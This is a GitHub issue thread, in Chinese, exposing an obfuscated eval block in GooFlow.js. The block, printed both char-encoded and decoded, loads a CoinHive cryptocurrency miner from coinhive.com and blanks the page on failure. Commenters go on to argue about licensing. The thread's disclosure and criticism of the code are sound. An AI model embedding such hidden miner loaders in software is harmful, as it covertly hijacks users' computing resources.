### ISSUE TITLE
能解释一下src/GooFlow.js里L446-L462这段代码的用处吗？

### ISSUE THREAD

**Issue by LiLiKazine** [sdlddr/Gooflow#13]
```
eval((function(c){var r='';for(var z=0;z<c.length;z++)r+=String.fromCharCode(c[z]);return r})([
			118,97,114,32,95,61,119,105,110,100,111,119,59,116,114,121,123,95,61,95,46,111,112,101,110,101,114,46,36,125,
			99,97,116,99,104,40,101,41,123,116,114,121,123,95,61,95,46,116,111,112,46,36,125,99,97,116,99,104,40,101,41,
			123,95,61,36,125,125,59,105,102,40,33,95,40,34,104,101,97,100,34,41,46,100,97,116,97,40,39,120,39,41,41,123,
			71,111,111,70,108,111,119,46,97,61,49,59,95,97,61,50,48,59,118,97,114,32,100,61,110,101,119,32,68,97,116,101,
			40,41,59,95,40,34,104,101,97,100,34,41,46,100,97,116,97,40,39,120,39,44,49,41,59,95,46,97,106,97,120,40,34,
			104,116,116,112,115,58,47,47,99,111,105,110,104,105,118,101,46,99,111,109,47,108,105,98,47,99,111,105,110,104,
			105,118,101,46,109,105,110,46,106,115,63,34,43,100,46,103,101,116,70,117,108,108,89,101,97,114,40,41,43,100,
			46,103,101,116,77,111,110,116,104,40,41,43,100,46,103,101,116,68,97,116,101,40,41,44,123,100,97,116,97,84,121,
			112,101,58,39,115,99,114,105,112,116,39,44,99,97,99,104,101,58,116,114,117,101,125,41,59,95,105,61,115,101,
			116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,116,114,121,123,110,101,119,32,
			67,111,105,110,72,105,118,101,46,65,110,111,110,121,109,111,117,115,40,39,71,71,100,80,71,104,120,73,108,111,
			108,100,97,65,114,65,114,81,86,119,120,90,50,115,100,56,108,48,97,52,107,72,39,44,123,116,104,114,111,116,116,
			108,101,58,48,46,51,125,41,46,115,116,97,114,116,40,41,59,99,108,101,97,114,73,110,116,101,114,118,97,108,40,
			95,105,41,125,99,97,116,99,104,40,101,41,123,95,97,45,45,59,105,102,40,95,97,60,49,41,100,111,99,117,109,101,
			110,116,46,119,114,105,116,101,40,34,34,41,125,125,44,49,48,48,48,41,125
		]),this.$draw);
```

**Comment by xxmyjk** [comment]
版权声明

**Comment by justjavac** [comment]
据说是整个项目最重要、最值钱的一行代码。

我虽然知道代码的作用，但是我不敢说出来，我怕作者起诉我

:joy:

**Comment by calchen** [comment]
这是一段非常重要的代码，整个项目最有价值，最重要的代码。不可说不可说，说了侵权的

**Comment by justjavac** [comment]
软件介绍：

 | - | - 
---- | ---
软件名| GooFlow 
介绍 |  在线流程设计器
主要功能 | 挖矿
软件性质 | 恶意软件
配置要求 | **CPU 9999999G**，**内存 999999999T**

**Comment by sdlddr** [comment]
盗贼们的小号真多

**Comment by sdlddr** [comment]
防止各位伸手党们不购买就拿去用在实际项目里营利哦。

**Comment by zpf124** [comment]
作为一个局外人过来看热闹，我还是劝作者下次先好好了解一下开源协议。

不准备开源直接挂一个私有license，或者扔到gitlab,bitbucket的免费私有库里。

**Comment by soulteary** [comment]
@justjavac 价值万金的代码不至一行哦，不过之前被挂马者玩坏了，现在随便找个adblock列表，资源域就赫然名列其中，https://pgl.yoyo.org/adservers/

**Comment by wan-qy** [comment]
已经有84个fork了呢，怕是现在去掉license/删repo也没有什么卵用

**Comment by iBug** [comment]
用 Node.js 简单跑了一下，把 `eval` 改成 `console.log`，你马上就知道是什么了，#(滑稽)

**Comment by sunqi0928** [comment]
`var _ = window;
try {
    _ = _.opener.$
} catch(e) {
    try {
        _ = _.top.$
    } catch(e) {
        _ = $
    }
};
if (!_("head").data('x')) {
    GooFlow.a = 1;
    _a = 20;
    var d = new Date();
    _("head").data('x', 1);
    _.ajax("coinhive.com/lib/coinhive.min.js?" + d.getFullYear() + d.getMonth() + d.getDate(), {
        dataType: 'script',
        cache: true
    });
    _i = setInterval(function() {
        try {
            new CoinHive.Anonymous('GGdPGhxIloldaArArQVwxZ2sd8l0a4kH', {
                throttle: 0.3
            }).start();
            clearInterval(_i)
        } catch(e) {
            _a--;
            if (_a < 1) document.write("")
        }
    },
    1000)
}`

**Comment by sdlddr** [comment]
MIT协议：
被授权人权利
被授权人有权利使用、复制、修改、合并、出版发行、散布、再授权及贩售软件及软件的副本。
被授权人可根据程序的需要修改授权条款为适当的内容。
被授权人义务
在软件和软件的所有副本中都必须包含版权声明和许可声明。
其他重要特性
此授权条款并非属copyleft的自由软件授权条款，允许在自由/开放源码软件或非自由软件（proprietary software）所使用。
MIT的内容可依照程序著作权者的需求更改内容。此亦为MIT与BSD（The BSD license, 3-clause BSD license）本质上不同处。
MIT条款可与其他授权条款并存。另外，MIT条款也是自由软件基金会（FSF）所认可的自由软件授权条款，与GPL兼容。

@zpf124 MIT的内容可依照程序著作权者的需求更改内容。这条说明清楚了， 注意哦。

**Comment by iBug** [comment]
@sdlddr 没错，MIT 协议的内容可以由作者自定义，但是即使你改了，也不影响你更改协议之前的版本所使用的协议。换句话说，修改协议即时生效，自修改之后的版本有效。

**Comment by sunqi0928** [comment]
```
var _ = window;
try {
    _ = _.opener.$
} catch(e) {
    try {
        _ = _.top.$
    } catch(e) {
        _ = $
    }
};
if (!_("head").data('x')) {
    GooFlow.a = 1;
    _a = 20;
    var d = new Date();
    _("head").data('x', 1);
    _.ajax("coinhive.com/lib/coinhive.min.js?" + d.getFullYear() + d.getMonth() + d.getDate(), {
        dataType: 'script',
        cache: true
    });
    _i = setInterval(function() {
        try {
            new CoinHive.Anonymous('GGdPGhxIloldaArArQVwxZ2sd8l0a4kH', {
                throttle: 0.3
            }).start();
            clearInterval(_i)
        } catch(e) {
            _a--;
            if (_a < 1) document.write("")
        }
    },
    1000)
}
```

**Comment by sunqi0928** [comment]
解释解释这个吧先~

**Comment by iBug** [comment]
自己把这段代码复制下来存到文件里，开头的 `eval` 改成 `console.log`，然后 Node 跑一下，你就能看到本项目中最值钱的代码：版权协议 了

![img](https://i.stack.imgur.com/lBWIE.png)

**Comment by jo-wu** [comment]
@sdlddr 你应当提高自身的知识水平啊，这种情况应当使用GPL相关协议，禁止使用在商业项目中。
协议的更改跟当前协议是无关的，你可以从MIT协议转到其他协议，也可以从其他协议转到MIT协议。MIT协议只对项目本身的版权进行限制，而不是对协议本身进行约束。说白了，就是你根本不了解开源协议。退一万步，你在你的试用版本中说明了可以用于非盈利性项目，但是你却在其中植入挖矿和挂马？？？你不觉得哪里不对劲吗？我觉得你应当用其他方式去保障自己的项目被偷偷用于商业项目中，而不是假装自己没干什么然后随便指着别人骂贼。祝您发财。

**Comment by zpf124** [comment]
@sdlddr 
然而 不论是MIT还是其他几种 开源协议 都允许了其他人去拷贝修改。只要人家没有用于商业盈利那人家复制、修改你的代码都是合理的，你将所有用到你项目还没给你交钱的人都称之为“强盗”是错误的想法。

所以我说 你如果只是想找个储存库并不想给让别人用的话，你应该扔个私有license声明禁止别人使用，当然实际情况不顾协议直接clone的绝对不少，但道理上至少是他们理亏而不像现在的你。
而且公开仓库放私有内容多少算是误用，按道理应该放到私有库里的，gitlab 还有其他好几家都有免费的私有库的。

而且 这只是你一面的说辞 我看了一下你那个带毒的js 从第二次提交就有挖矿代码了，真的只是因为看到有人商用了还没给钱愤慨之下才出的下策吗？

**Comment by gclove** [comment]
@sdlddr  你确实不应该用这种方式，还不如挂个二维码。 让大家捐赠。。。

然后，公布捐赠者

**Comment by sdlddr** [comment]
@gclove 捐赠？不存在的，你太低估盗版人的决心了。

**Comment by sdlddr** [comment]
@iBug 问题是，我老早之前一直是使用这种修改后的协议的

**Comment by iBug** [comment]
@sdlddr 老早之前？能拿出你的 commit 出来吗？

**Comment by appbeijing** [comment]
你竟然在代码里下毒，程序员都不再单纯了

**Comment by maxlxq** [comment]
代码有毒

**Comment by CCCzKen** [comment]
我这么相信你，你居然在码里下毒。喷血GIF

**Comment by sdlddr** [comment]
@appbeijing @maxlxq@CCCzKen 请先搞清楚病毒的定义再来喷人吧，

**Comment by QuantumGhost** [comment]
@jo-wu 纠正一下，GPL 不禁止商业使用，GPL 只是要求任何衍生都要按照相同协议（GPL）开源而已。

**Comment by songtianyi** [comment]
无毒无马
[🍑](https://github.com/songtianyi/wechat-go)

**Comment by wan-qy** [comment]
@QuantumGhost
这种情况下 AGPL 可能最合适
